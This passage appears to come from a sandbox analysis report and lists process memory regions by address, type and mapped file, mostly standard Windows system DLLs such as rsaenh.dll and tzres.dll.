entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5031
start_va = 0x940000
end_va = 0xc0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5032
start_va = 0x60000
end_va = 0x64fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 5033
start_va = 0x7e0000
end_va = 0x85cfff
monitored = 0
entry_point = 0x7ecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5034
start_va = 0x8c0000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 5035
start_va = 0x7e0000
end_va = 0x85cfff
monitored = 0
entry_point = 0x7ecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5036
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 5037
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5038
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5039
start_va = 0xd60000
end_va = 0xddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d60000"
filename = ""
Region:
id = 5040
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 5041
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 5042
start_va = 0xe10000
end_va = 0xe8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 5043
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 5044
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 5045
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 5046
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 5047
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 5048
start_va = 0x7e0000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5049
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 5050
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 5051
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5052
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5053
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5054
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5055
start_va = 0x860000
end_va = 0x8a4fff
monitored = 0
entry_point = 0x861064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5056
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5057
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 5058
start_va = 0xc70000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 5059
start_va = 0xf50000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f50000"
filename = ""
Region:
id = 5060
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 5061
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 5062
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 5063
start_va = 0x1100000
end_va = 0x117ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 5064
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 5065
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 5066
start_va = 0x7fef4a50000
end_va = 0x7fef4c49fff
monitored = 1
entry_point = 0x7fef4a64c9c
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 5067
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 5068
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5069
start_va = 0x190000
end_va = 0x195fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 5070
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 5071
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5072
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5073
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5074
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5075
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5076
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5077
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5078
start_va = 0xfd0000
end_va = 0x1097fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll"
filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll")
Region:
id = 5079
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "basebrd.dll.mui"
filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui")
Region:
id = 5080
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5081
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5082
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5083
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5084
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5085
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5086
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5087
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5088
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5089
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5090
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5091
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5092
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5093
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5094
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5095
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5096
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5097
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5098
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5099
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5100
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5101
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5102
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5103
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5104
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5105
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5106
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5107
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5108
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5109
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5110
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5111
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5112
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5113
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5114
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5115
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5116
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5117
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5118
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5119
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5120
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5121
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5122
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5123
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5124
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5125
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5126
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5127
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5128
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5129
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5130
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5131
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5132
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5133
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5134
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5135
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5136
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5137
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5138
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5139
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5140
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5141
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5142
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5143
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5144
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5145
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5146
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5147
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5148
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5149
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5150
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5151
start_va = 0x1a0000
end_va = 0x1a6fff
